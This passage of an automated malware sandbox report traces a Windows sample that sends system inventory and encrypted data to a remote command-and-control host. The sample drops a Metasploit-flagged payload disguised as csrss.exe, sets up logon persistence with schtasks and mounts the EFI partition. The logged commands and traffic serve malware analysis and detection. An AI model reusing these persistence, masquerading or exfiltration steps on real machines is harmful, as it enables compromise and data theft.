                                                                                                  Content-Length: 18950
                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:06 UTC8OUTData Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 39 20 58 36 34 20 4d 69 6e 69 6d 75 6d 20 52 75 6e 74 69 6d 65 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 31 2e 30 2e 36 31 30 33 30 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 31 2e 30 2e 36 31 30 33 30 2e 30 22 2c 22 69 6e 73 74
                                                                                                  Data Ascii: [{"display_name":"Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190627"},{"display_name":"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030","display_version":"11.0.61030.0","inst
                                                                                                  2021-11-04 12:13:06 UTC9OUTData Raw: 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 53 68 61 72 65 64 20 36 34 2d 62 69 74 20 53 65 74 75 70 20 4d 65 74 61 64 61 74 61 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22
                                                                                                  Data Ascii: lay_name":"Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Update for Microsoft Office 2016 (KB4475580) 32-Bit Edition","display_version":"","install_date":""
                                                                                                  2021-11-04 12:13:06 UTC11OUTData Raw: 4b 42 34 34 37 35 35 38 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 75 62 6c 69 73 68 65 72 20 32 30 31 36 20 28 4b 42 34 30 31 31 30 39 37 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35
                                                                                                  Data Ascii: KB4475580) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB44645
                                                                                                  2021-11-04 12:13:06 UTC12OUTData Raw: 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 31 39 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 38 36 29 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 2e 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 30 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74
                                                                                                  Data Ascii: ll_date":""},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition","display_version":"","inst
                                                                                                  2021-11-04 12:13:06 UTC16OUTData Raw: 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 31 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 34 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 33 20 78 38 36
                                                                                                  Data Ascii: Microsoft Office 2016 (KB4484214) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484248) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2013 x86
                                                                                                  2021-11-04 12:13:06 UTC20OUTData Raw: 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 20 66 6f 72 20 42 75 73 69 6e 65 73 73 20 28 4b 42 34 30 32 32 32 31 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 30 38 35 35 33 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c
                                                                                                  Data Ascii: "install_date":""},{"display_name":"Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2016 (KB3085538) 32-Bit Edition","display_version":"",
                                                                                                  2021-11-04 12:13:06 UTC24OUTData Raw: 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35 33 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 46 6f 6e 74 63 6f 72 65 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 30 33 32 32 33 36 29 20 33 32 2d
                                                                                                  Data Ascii: 23"},{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Fontcore","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4032236) 32-
                                                                                                  2021-11-04 12:13:06 UTC27INHTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 04 Nov 2021 12:13:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ub0PA9Fmqq7OZHOTnOGcBRJwBnYj5ryxvyzrx6FOHxWcZzcHyVWiVfUPaGejltXTD%2F6SRqhh%2Br%2FCIFY9JbyleDFHvMUOkdoo5Awj3PJCVy9rH9NMnIkhsde%2BuCf1%2BDnWMfdu2Yl"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc126190b7037-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:13:06 UTC27INData Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                                                                  2021-11-04 12:13:06 UTC28INData Raw: 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a
                                                                                                  Data Ascii: pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head>
                                                                                                  2021-11-04 12:13:06 UTC29INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  9192.168.2.349761172.67.139.144443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:15 UTC29OUTPOST /api/poll HTTP/1.1
                                                                                                  Host: server2.trumops.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
                                                                                                  Content-Length: 640
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:15 UTC29OUTData Raw: 44 7a 4f 47 6d 43 49 6c 42 47 33 62 76 75 48 64 6c 2f 39 38 77 50 59 51 36 72 65 73 64 63 6a 37 39 39 34 5a 4f 43 56 44 39 42 6c 72 4c 67 57 54 7a 6e 55 78 48 47 49 47 65 43 49 67 34 68 35 51 4c 67 48 7a 75 7a 32 73 57 63 36 72 2b 69 71 4a 6e 7a 68 34 41 48 76 34 78 6d 73 2f 37 66 58 71 6d 44 74 79 6b 78 31 47 6a 4b 79 45 4f 35 73 37 45 62 59 58 34 57 62 78 55 39 62 56 7a 6f 65 44 51 71 59 4b 48 37 6d 64 43 6b 47 31 6d 47 57 54 43 49 36 49 70 6e 39 78 53 6f 65 6a 39 6b 68 2f 72 55 66 35 55 50 47 70 56 78 32 50 70 62 63 73 4d 4b 61 42 44 30 4c 76 59 4a 66 65 7a 6f 59 52 35 30 45 2b 6f 33 59 32 42 41 2f 58 6f 43 6c 51 6c 50 73 4f 39 79 67 46 51 38 72 39 71 43 33 70 33 46 5a 46 48 62 4a 37 62 36 61 7a 6b 6b 39 48 78 69 46 77 59 61 4e 62 53 6b 5a 38 4c 31 79
                                                                                                  Data Ascii: DzOGmCIlBG3bvuHdl/98wPYQ6resdcj7994ZOCVD9BlrLgWTznUxHGIGeCIg4h5QLgHzuz2sWc6r+iqJnzh4AHv4xms/7fXqmDtykx1GjKyEO5s7EbYX4WbxU9bVzoeDQqYKH7mdCkG1mGWTCI6Ipn9xSoej9kh/rUf5UPGpVx2PpbcsMKaBD0LvYJfezoYR50E+o3Y2BA/XoClQlPsO9ygFQ8r9qC3p3FZFHbJ7b6azkk9HxiFwYaNbSkZ8L1y
                                                                                                  2021-11-04 12:13:15 UTC29INHTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 04 Nov 2021 12:13:15 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  set-cookie: PHPSESSID=jp6rg8da1hqqg23tjramjvmq4d; path=/; HttpOnly
                                                                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  cache-control: no-store, no-cache, must-revalidate
                                                                                                  pragma: no-cache
                                                                                                  access-control-allow-credentials: false
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VULNO5Jg3NJ174F0kG6Gst68KUn7qITHMZj2A7IY4Nz0a1rfozYrXWuoYRMg%2FxRYwvjKeu5aorLZfTsqKFJnH5%2B410dszzmqHyXdOL7bIrl%2BSVbGW2OHUGkkeU93qYeHI6CXQle4"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc15e7c2f774a-LHR
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:13:15 UTC30INData Raw: 65 38 0d 0a 78 53 78 67 2f 62 66 6c 51 4a 71 62 2b 47 6c 36 45 72 4b 38 45 4c 4e 61 48 7a 6b 4d 77 67 43 4e 4b 67 53 61 69 4f 63 68 41 78 73 6a 67 2b 4d 59 45 58 63 45 6b 54 2f 49 6e 36 69 2f 4f 48 38 73 35 71 66 4a 48 2f 30 6d 56 33 43 50 62 7a 72 4b 4a 76 4b 55 45 4f 31 54 34 73 78 75 46 41 57 42 6f 2f 49 61 70 50 63 70 70 31 6e 37 71 55 63 64 6c 69 34 79 70 4d 4f 59 34 4d 42 76 63 58 38 2b 50 6a 38 4c 39 48 67 7a 43 38 54 6c 70 59 50 4a 72 2b 4c 33 77 61 37 37 45 61 63 55 75 6f 4b 7a 4a 38 68 61 75 33 4f 71 66 4f 6c 37 4e 72 57 7a 36 6e 45 6d 5a 72 35 38 4a 58 57 51 31 39 36 64 50 6c 34 6a 53 39 52 7a 7a 4a 47 39 32 74 69 34 4e 71 43 2b 45 4a 71 57 31 45 72 61 65 70 54 52 52 79 76 53 55 67 3d 3d 0d 0a
                                                                                                  Data Ascii: e8xSxg/bflQJqb+Gl6ErK8ELNaHzkMwgCNKgSaiOchAxsjg+MYEXcEkT/In6i/OH8s5qfJH/0mV3CPbzrKJvKUEO1T4sxuFAWBo/IapPcpp1n7qUcdli4ypMOY4MBvcX8+Pj8L9HgzC8TlpYPJr+L3wa77EacUuoKzJ8hau3OqfOl7NrWz6nEmZr58JXWQ196dPl4jS9RzzJG92ti4NqC+EJqW1EraepTRRyvSUg==
                                                                                                  2021-11-04 12:13:15 UTC31INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: 0NlSa5bf55.exe PID: 2956 Parent PID: 3044

                                                                                                  General

                                                                                                  Start time:13:12:34
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\0NlSa5bf55.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2095616 bytes
                                                                                                  MD5 hash:EE30D6928C9DE84049AA055417CC767E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low

                                                                                                  Analysis Process: conhost.exe PID: 2700 Parent PID: 2956

                                                                                                  General

                                                                                                  Start time:13:12:35
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Analysis Process: upd.exe PID: 5716 Parent PID: 2956

                                                                                                  General

                                                                                                  Start time:13:12:39
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\Desktop\upd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\upd.exe -update
                                                                                                  Imagebase:0x400000
                                                                                                  File size:3788288 bytes
                                                                                                  MD5 hash:3C3046F640F7825C720849AAA809C963
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 31%, Metadefender, Browse
                                                                                                  • Detection: 86%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Analysis Process: svchost.exe PID: 2008 Parent PID: 572

                                                                                                  General

                                                                                                  Start time:13:12:44
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Analysis Process: TrustedInstaller.exe PID: 5352 Parent PID: 572

                                                                                                  General

                                                                                                  Start time:13:12:45
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  Imagebase:0x7ff635d90000
                                                                                                  File size:131584 bytes
                                                                                                  MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Analysis Process: upd.exe PID: 1304 Parent PID: 5716

                                                                                                  General

                                                                                                  Start time:13:12:46
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\Desktop\upd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\upd.exe" -update
                                                                                                  Imagebase:0x400000
                                                                                                  File size:3788288 bytes
                                                                                                  MD5 hash:3C3046F640F7825C720849AAA809C963
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Analysis Process: svchost.exe PID: 6688 Parent PID: 572

                                                                                                  General

                                                                                                  Start time:13:12:54
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Analysis Process: csrss.exe PID: 464 Parent PID: 1304

                                                                                                  General

                                                                                                  Start time:13:12:57
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\rss\csrss.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:3788288 bytes
                                                                                                  MD5 hash:3C3046F640F7825C720849AAA809C963
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 31%, Metadefender, Browse
                                                                                                  • Detection: 86%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Analysis Process: schtasks.exe PID: 4644 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:06
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                                  Imagebase:0x7ff646d20000
                                                                                                  File size:226816 bytes
                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Analysis Process: conhost.exe PID: 5360 Parent PID: 4644

                                                                                                  General

                                                                                                  Start time:13:13:06
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: schtasks.exe PID: 5916 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:06
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                                                                  Imagebase:0x7ff646d20000
                                                                                                  File size:226816 bytes
                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 6324 Parent PID: 5916

                                                                                                  General

                                                                                                  Start time:13:13:07
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: mountvol.exe PID: 6396 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:07
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /s
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 6344 Parent PID: 6396

                                                                                                  General

                                                                                                  Start time:13:13:09
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
